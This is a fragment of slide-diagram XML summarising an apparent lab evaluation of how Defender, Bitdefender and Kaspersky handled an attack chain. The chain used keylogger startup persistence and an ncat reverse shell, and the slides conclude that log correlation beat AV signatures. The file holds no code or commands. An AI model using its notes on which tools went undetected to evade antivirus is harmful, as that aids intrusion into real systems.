              <a:latin typeface="Grandview Display"/>
            </a:rPr>
            <a:t>Usage</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CB59E356-8BA9-45E4-A4D5-84A94F5ED85E}" type="parTrans" cxnId="{8FECD907-8887-46DB-B1DE-85E0A1A97D2F}">
      <dgm:prSet/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E6094DBF-278F-44D3-B0D2-0F89D7323F92}" type="sibTrans" cxnId="{8FECD907-8887-46DB-B1DE-85E0A1A97D2F}">
      <dgm:prSet/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{298C3BEE-37DF-425F-B27C-DBCE26375C26}">
      <dgm:prSet phldr="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="en-GB">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Grandview Display"/>
            </a:rPr>
            <a:t>Total</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t> CPU usage stayed below 6% during full attack chain execution.</a:t>
          </a:r>
          <a:endParaRPr lang="en-GB">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="49000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:latin typeface="Grandview Display"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0CB63A2B-E456-46C3-B787-707F1F4F40B7}" type="parTrans" cxnId="{C5FE6BBF-3142-49F9-A78F-32F05DFA2534}">
      <dgm:prSet/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CDCF93B2-3686-482D-A706-027C70934248}" type="sibTrans" cxnId="{C5FE6BBF-3142-49F9-A78F-32F05DFA2534}">
      <dgm:prSet/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1A57A534-E936-46BA-9FC1-2D0CDAB6A52D}">
      <dgm:prSet phldr="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="en-GB">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>Defender + Bitdefender together used ~50 MB RAM and ran quietly in the background.</a:t>
          </a:r>
          <a:endParaRPr lang="en-GB">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="49000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:latin typeface="Grandview Display"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EA6BE566-C68B-4437-9A6E-D724F79BC85B}" type="parTrans" cxnId="{6E27C9F8-7056-4612-8F2B-5D4BB61956F8}">
      <dgm:prSet/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6F174352-F06E-40F6-8A8D-A755AF6C54D9}" type="sibTrans" cxnId="{6E27C9F8-7056-4612-8F2B-5D4BB61956F8}">
      <dgm:prSet/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8130DEF9-844F-4C44-9D9B-C3CA2221B373}">
      <dgm:prSet phldr="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="en-GB">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>Kaspersky consumed the most RAM (~311 MB) but still produced no alerts.</a:t>
          </a:r>
          <a:endParaRPr lang="en-GB">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="49000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:latin typeface="Grandview Display"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{91A39AB4-A4B7-4040-AEF4-D08F039D0436}" type="parTrans" cxnId="{B6DD13CF-07F9-4AD2-B996-6DE009EDA094}">
      <dgm:prSet/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BD5BE7D8-EA31-4C9A-A908-3E21C0DD7EA5}" type="sibTrans" cxnId="{B6DD13CF-07F9-4AD2-B996-6DE009EDA094}">
      <dgm:prSet/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A8A68928-D608-4700-A7C7-1BE8FA5936ED}">
      <dgm:prSet phldr="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="en-GB">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>No major CPU or memory spikes → stealth operations remained low-noise and difficult to detect based on performance monitoring alone.</a:t>
          </a:r>
          <a:endParaRPr lang="en-GB">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="49000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:latin typeface="Grandview Display"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3675D8DA-ACB2-445B-B1F8-81FD10F94BCD}" type="parTrans" cxnId="{0E7CF181-FD9A-4406-A024-A2545C83C715}">
      <dgm:prSet/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6ADCB0A5-7BE2-4B82-BC51-395B1D66CD0E}" type="sibTrans" cxnId="{0E7CF181-FD9A-4406-A024-A2545C83C715}">
      <dgm:prSet/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5111464D-F652-4C03-9AF7-075045347EC7}">
      <dgm:prSet phldr="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="en-GB">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Detection </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Grandview Display"/>
            </a:rPr>
            <a:t>Observations</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5A14EC25-C5C4-460D-A191-21BD18DD66CC}" type="parTrans" cxnId="{8A2B57E5-1A22-40C8-A05B-99031704F6D3}">
      <dgm:prSet/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B8573D48-E3C9-4383-9ED8-1BF7D9D53235}" type="sibTrans" cxnId="{8A2B57E5-1A22-40C8-A05B-99031704F6D3}">
      <dgm:prSet/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2BD32C9E-9541-49C3-99D4-D9D97A205656}">
      <dgm:prSet phldr="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="en-GB">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Grandview Display"/>
            </a:rPr>
            <a:t>Startup</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t> persistence (keylog.py, cmd_commands.bat) was not flagged immediately by any AV.</a:t>
          </a:r>
          <a:endParaRPr lang="en-GB">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="49000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:latin typeface="Grandview Display"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B0B5098F-FB0B-41DB-B09E-DB63D9B7FBB5}" type="parTrans" cxnId="{B3D65296-FDC0-4D03-A8AD-DB4585A7E524}">
      <dgm:prSet/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{92EAA35F-DB06-42BD-9263-DD09FA54E310}" type="sibTrans" cxnId="{B3D65296-FDC0-4D03-A8AD-DB4585A7E524}">
      <dgm:prSet/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3BAEA2F3-3292-4134-87F1-B9FF9535779B}">
      <dgm:prSet phldr="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="en-GB">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>Reverse shell (ncat) generated some network visibility but no real-time process block.</a:t>
          </a:r>
          <a:endParaRPr lang="en-GB">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="49000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:latin typeface="Grandview Display"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{281F06E6-DE39-4D4B-9FA2-8AE01723E99B}" type="parTrans" cxnId="{424B7CC4-2AE2-448B-9953-1E81F8C5E99D}">
      <dgm:prSet/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B35EACF7-8CA7-4CDB-8FB6-F64E8838BC80}" type="sibTrans" cxnId="{424B7CC4-2AE2-448B-9953-1E81F8C5E99D}">
      <dgm:prSet/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DE15E243-4777-44DA-B53E-030BE7083654}">
      <dgm:prSet phldr="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l"/>
          <a:r>
            <a:rPr lang="en-GB">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>Defender caught partial activity, but only after user manually approved execution.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F7B1A6D8-F0D4-4352-8287-5FC3A07EA9A4}" type="parTrans" cxnId="{3FCA68BE-B705-417B-B363-7BC692FF3169}">
      <dgm:prSet/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DA7920CA-AB03-47F5-8BD7-8C19C9669F4E}" type="sibTrans" cxnId="{3FCA68BE-B705-417B-B363-7BC692FF3169}">
      <dgm:prSet/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{38CB68E3-E63F-4DC7-9EF2-5519CDC1E2D7}">
      <dgm:prSet phldr="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="en-GB">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>Bitdefender &amp; Kaspersky raised no detection alerts at any stage.</a:t>
          </a:r>
          <a:endParaRPr lang="en-GB">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="49000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:latin typeface="Grandview Display"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{996B1DA5-FF1C-4AFD-B25E-D36EF2E0119A}" type="parTrans" cxnId="{800B3ADF-DC4E-48C6-A70F-0E4663FB8121}">
      <dgm:prSet/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D3879B98-1865-4BE1-8C78-354ED3E0AA45}" type="sibTrans" cxnId="{800B3ADF-DC4E-48C6-A70F-0E4663FB8121}">
      <dgm:prSet/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{71274B16-FD9E-470A-9BB6-500F49ABCF4F}">
      <dgm:prSet phldr="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="en-GB">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Key </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Grandview Display"/>
            </a:rPr>
            <a:t>Insight</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D00C1212-009A-44C9-86A4-D39C8B421AC0}" type="parTrans" cxnId="{9C485504-E57E-4A56-A8EB-2ADDF5C047E9}">
      <dgm:prSet/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CA9084A2-0EAD-4A89-9720-E0E16A0B975A}" type="sibTrans" cxnId="{9C485504-E57E-4A56-A8EB-2ADDF5C047E9}">
      <dgm:prSet/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8F2A14D4-22D5-4B65-8954-27C4820B8422}">
      <dgm:prSet phldr="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l"/>
          <a:r>
            <a:rPr lang="en-GB">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Grandview Display"/>
            </a:rPr>
            <a:t>Detection</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t> was only effective when network traffic or host telemetry (Sysmon Event ID 1) were </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Grandview Display"/>
            </a:rPr>
            <a:t>analysed</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr algn="l"/>
          <a:r>
            <a:rPr lang="en-GB">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>Antivirus agents alone were insufficient — high RAM usage (like Kaspersky’s) did not equal better protection.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr algn="l"/>
          <a:r>
            <a:rPr lang="en-GB">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>Conclusion: Real detection depends on log correlation, not just AV signatures or resource footprint.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:endParaRPr lang="en-GB">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="49000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6BFAFA89-C2B6-4DEF-A90B-B3C5CA5E04F4}" type="parTrans" cxnId="{65522DA5-1F7A-474E-BB91-91933D433AF1}">
      <dgm:prSet/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FFFFC9AF-0857-4409-B2C5-B6BBAC330FE5}" type="sibTrans" cxnId="{65522DA5-1F7A-474E-BB91-91933D433AF1}">
      <dgm:prSet/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1C7F4904-893A-4034-B37F-6F6B8D71F970}" type="pres">
      <dgm:prSet presAssocID="{A7692B4F-9C50-4B44-960F-20E8B0DAFE17}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{ADE69764-FACE-4485-A045-F431674AA07F}" type="pres">
      <dgm:prSet presAssocID="{69D0DB85-4D25-4AA2-8260-CB85AD77E5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B41E3E0-DA76-40EA-ACE9-48C4AA128554}" type="pres">
      <dgm:prSet presAssocID="{69D0DB85-4D25-4AA2-8260-CB85AD77E513}" presName="childText" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6BCA9DF8-092A-4FE2-A981-5695330CE23E}" type="pres">
      <dgm:prSet presAssocID="{5111464D-F652-4C03-9AF7-075045347EC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4A570A-5188-4F7B-8B2A-3AA076EEF003}" type="pres">
      <dgm:prSet presAssocID="{5111464D-F652-4C03-9AF7-075045347EC7}" presName="childText" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{673AF65F-26D2-4E86-B034-A65A1E2B3001}" type="pres">
      <dgm:prSet presAssocID="{71274B16-FD9E-470A-9BB6-500F49ABCF4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F468A81-C938-44FF-A203-3EF26AD1AB62}" type="pres">
      <dgm:prSet presAssocID="{71274B16-FD9E-470A-9BB6-500F49ABCF4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C485504-E57E-4A56-A8EB-2ADDF5C047E9}" srcId="{A7692B4F-9C50-4B44-960F-20E8B0DAFE17}" destId="{71274B16-FD9E-470A-9BB6-500F49ABCF4F}" srcOrd="2" destOrd="0" parTransId="{D00C1212-009A-44C9-86A4-D39C8B421AC0}" sibTransId="{CA9084A2-0EAD-4A89-9720-E0E16A0B975A}"/>
    <dgm:cxn modelId="{8FECD907-8887-46DB-B1DE-85E0A1A97D2F}" srcId="{A7692B4F-9C50-4B44-960F-20E8B0DAFE17}" destId="{69D0DB85-4D25-4AA2-8260-CB85AD77E513}" srcOrd="0" destOrd="0" parTransId="{CB59E356-8BA9-45E4-A4D5-84A94F5ED85E}" sibTransId="{E6094DBF-278F-44D3-B0D2-0F89D7323F92}"/>
    <dgm:cxn modelId="{F268123B-21D2-4B1A-A71A-B0E2A3E0ED69}" type="presOf" srcId="{A8A68928-D608-4700-A7C7-1BE8FA5936ED}" destId="{5B41E3E0-DA76-40EA-ACE9-48C4AA128554}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{6CDDF54D-C32D-4958-A6B0-F9DC1116FC8A}" type="presOf" srcId="{DE15E243-4777-44DA-B53E-030BE7083654}" destId="{BC4A570A-5188-4F7B-8B2A-3AA076EEF003}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{CF07E76E-C187-4A04-B9B7-52D77FFFEC92}" type="presOf" srcId="{8F2A14D4-22D5-4B65-8954-27C4820B8422}" destId="{7F468A81-C938-44FF-A203-3EF26AD1AB62}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{09523F76-BE07-4781-9CA0-74B6A2656478}" type="presOf" srcId="{3BAEA2F3-3292-4134-87F1-B9FF9535779B}" destId="{BC4A570A-5188-4F7B-8B2A-3AA076EEF003}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{0E7CF181-FD9A-4406-A024-A2545C83C715}" srcId="{69D0DB85-4D25-4AA2-8260-CB85AD77E513}" destId="{A8A68928-D608-4700-A7C7-1BE8FA5936ED}" srcOrd="3" destOrd="0" parTransId="{3675D8DA-ACB2-445B-B1F8-81FD10F94BCD}" sibTransId="{6ADCB0A5-7BE2-4B82-BC51-395B1D66CD0E}"/>
    <dgm:cxn modelId="{9088EF83-34B2-4D71-839E-F79832522D37}" type="presOf" srcId="{A7692B4F-9C50-4B44-960F-20E8B0DAFE17}" destId="{1C7F4904-893A-4034-B37F-6F6B8D71F970}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{A61EA28C-1F06-4B1F-AC5C-1626B3F4C1D1}" type="presOf" srcId="{298C3BEE-37DF-425F-B27C-DBCE26375C26}" destId="{5B41E3E0-DA76-40EA-ACE9-48C4AA128554}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{B3D65296-FDC0-4D03-A8AD-DB4585A7E524}" srcId="{5111464D-F652-4C03-9AF7-075045347EC7}" destId="{2BD32C9E-9541-49C3-99D4-D9D97A205656}" srcOrd="0" destOrd="0" parTransId="{B0B5098F-FB0B-41DB-B09E-DB63D9B7FBB5}" sibTransId="{92EAA35F-DB06-42BD-9263-DD09FA54E310}"/>
    <dgm:cxn modelId="{C6798399-0E3A-48E9-A9CB-725E7B2D9725}" type="presOf" srcId="{2BD32C9E-9541-49C3-99D4-D9D97A205656}" destId="{BC4A570A-5188-4F7B-8B2A-3AA076EEF003}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{8C0A88A2-9FC6-4383-B044-94977B646FE2}" type="presOf" srcId="{1A57A534-E936-46BA-9FC1-2D0CDAB6A52D}" destId="{5B41E3E0-DA76-40EA-ACE9-48C4AA128554}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{65522DA5-1F7A-474E-BB91-91933D433AF1}" srcId="{71274B16-FD9E-470A-9BB6-500F49ABCF4F}" destId="{8F2A14D4-22D5-4B65-8954-27C4820B8422}" srcOrd="0" destOrd="0" parTransId="{6BFAFA89-C2B6-4DEF-A90B-B3C5CA5E04F4}" sibTransId="{FFFFC9AF-0857-4409-B2C5-B6BBAC330FE5}"/>
    <dgm:cxn modelId="{717D61AD-6B53-4AEA-99B2-0F75D333F641}" type="presOf" srcId="{5111464D-F652-4C03-9AF7-075045347EC7}" destId="{6BCA9DF8-092A-4FE2-A981-5695330CE23E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{0D2447AD-25E9-4AFB-9C20-EC3D6CBAC117}" type="presOf" srcId="{69D0DB85-4D25-4AA2-8260-CB85AD77E513}" destId="{ADE69764-FACE-4485-A045-F431674AA07F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{528699B0-ACC6-492B-8AD3-6D4E7F2C1780}" type="presOf" srcId="{8130DEF9-844F-4C44-9D9B-C3CA2221B373}" destId="{5B41E3E0-DA76-40EA-ACE9-48C4AA128554}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{3FCA68BE-B705-417B-B363-7BC692FF3169}" srcId="{5111464D-F652-4C03-9AF7-075045347EC7}" destId="{DE15E243-4777-44DA-B53E-030BE7083654}" srcOrd="2" destOrd="0" parTransId="{F7B1A6D8-F0D4-4352-8287-5FC3A07EA9A4}" sibTransId="{DA7920CA-AB03-47F5-8BD7-8C19C9669F4E}"/>
    <dgm:cxn modelId="{C5FE6BBF-3142-49F9-A78F-32F05DFA2534}" srcId="{69D0DB85-4D25-4AA2-8260-CB85AD77E513}" destId="{298C3BEE-37DF-425F-B27C-DBCE26375C26}" srcOrd="0" destOrd="0" parTransId="{0CB63A2B-E456-46C3-B787-707F1F4F40B7}" sibTransId="{CDCF93B2-3686-482D-A706-027C70934248}"/>
    <dgm:cxn modelId="{424B7CC4-2AE2-448B-9953-1E81F8C5E99D}" srcId="{5111464D-F652-4C03-9AF7-075045347EC7}" destId="{3BAEA2F3-3292-4134-87F1-B9FF9535779B}" srcOrd="1" destOrd="0" parTransId="{281F06E6-DE39-4D4B-9FA2-8AE01723E99B}" sibTransId="{B35EACF7-8CA7-4CDB-8FB6-F64E8838BC80}"/>
    <dgm:cxn modelId="{B6DD13CF-07F9-4AD2-B996-6DE009EDA094}" srcId="{69D0DB85-4D25-4AA2-8260-CB85AD77E513}" destId="{8130DEF9-844F-4C44-9D9B-C3CA2221B373}" srcOrd="2" destOrd="0" parTransId="{91A39AB4-A4B7-4040-AEF4-D08F039D0436}" sibTransId="{BD5BE7D8-EA31-4C9A-A908-3E21C0DD7EA5}"/>
    <dgm:cxn modelId="{800B3ADF-DC4E-48C6-A70F-0E4663FB8121}" srcId="{5111464D-F652-4C03-9AF7-075045347EC7}" destId="{38CB68E3-E63F-4DC7-9EF2-5519CDC1E2D7}" srcOrd="3" destOrd="0" parTransId="{996B1DA5-FF1C-4AFD-B25E-D36EF2E0119A}" sibTransId="{D3879B98-1865-4BE1-8C78-354ED3E0AA45}"/>
    <dgm:cxn modelId="{8A2B57E5-1A22-40C8-A05B-99031704F6D3}" srcId="{A7692B4F-9C50-4B44-960F-20E8B0DAFE17}" destId="{5111464D-F652-4C03-9AF7-075045347EC7}" srcOrd="1" destOrd="0" parTransId="{5A14EC25-C5C4-460D-A191-21BD18DD66CC}" sibTransId="{B8573D48-E3C9-4383-9ED8-1BF7D9D53235}"/>
    <dgm:cxn modelId="{3CC06DED-0F12-427E-A3D7-0745536E3016}" type="presOf" srcId="{38CB68E3-E63F-4DC7-9EF2-5519CDC1E2D7}" destId="{BC4A570A-5188-4F7B-8B2A-3AA076EEF003}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{C2DADEEF-8160-424B-902E-A88CD812C925}" type="presOf" srcId="{71274B16-FD9E-470A-9BB6-500F49ABCF4F}" destId="{673AF65F-26D2-4E86-B034-A65A1E2B3001}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{6E27C9F8-7056-4612-8F2B-5D4BB61956F8}" srcId="{69D0DB85-4D25-4AA2-8260-CB85AD77E513}" destId="{1A57A534-E936-46BA-9FC1-2D0CDAB6A52D}" srcOrd="1" destOrd="0" parTransId="{EA6BE566-C68B-4437-9A6E-D724F79BC85B}" sibTransId="{6F174352-F06E-40F6-8A8D-A755AF6C54D9}"/>
    <dgm:cxn modelId="{4257211C-B04E-4E6E-B157-F803B5A1DF05}" type="presParOf" srcId="{1C7F4904-893A-4034-B37F-6F6B8D71F970}" destId="{ADE69764-FACE-4485-A045-F431674AA07F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{3FEC05DE-2F58-47E8-8F51-B5D89644C25C}" type="presParOf" srcId="{1C7F4904-893A-4034-B37F-6F6B8D71F970}" destId="{5B41E3E0-DA76-40EA-ACE9-48C4AA128554}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{A6204DF8-0B61-40F6-A752-9125626E8924}" type="presParOf" srcId="{1C7F4904-893A-4034-B37F-6F6B8D71F970}" destId="{6BCA9DF8-092A-4FE2-A981-5695330CE23E}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{1E14EC56-79FC-43BF-9213-F9CFD59D679F}" type="presParOf" srcId="{1C7F4904-893A-4034-B37F-6F6B8D71F970}" destId="{BC4A570A-5188-4F7B-8B2A-3AA076EEF003}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{507DB3FB-B74C-4783-BC4D-013C9B55B6AE}" type="presParOf" srcId="{1C7F4904-893A-4034-B37F-6F6B8D71F970}" destId="{673AF65F-26D2-4E86-B034-A65A1E2B3001}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{10E5A773-150B-4281-ADF1-FF5FE9494B8E}" type="presParOf" srcId="{1C7F4904-893A-4034-B37F-6F6B8D71F970}" destId="{7F468A81-C938-44FF-A203-3EF26AD1AB6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D06B16D-8AD4-4B76-8064-63331D6BF8D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8FFACB-4E3D-44E8-A6E1-C630B7581E5A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
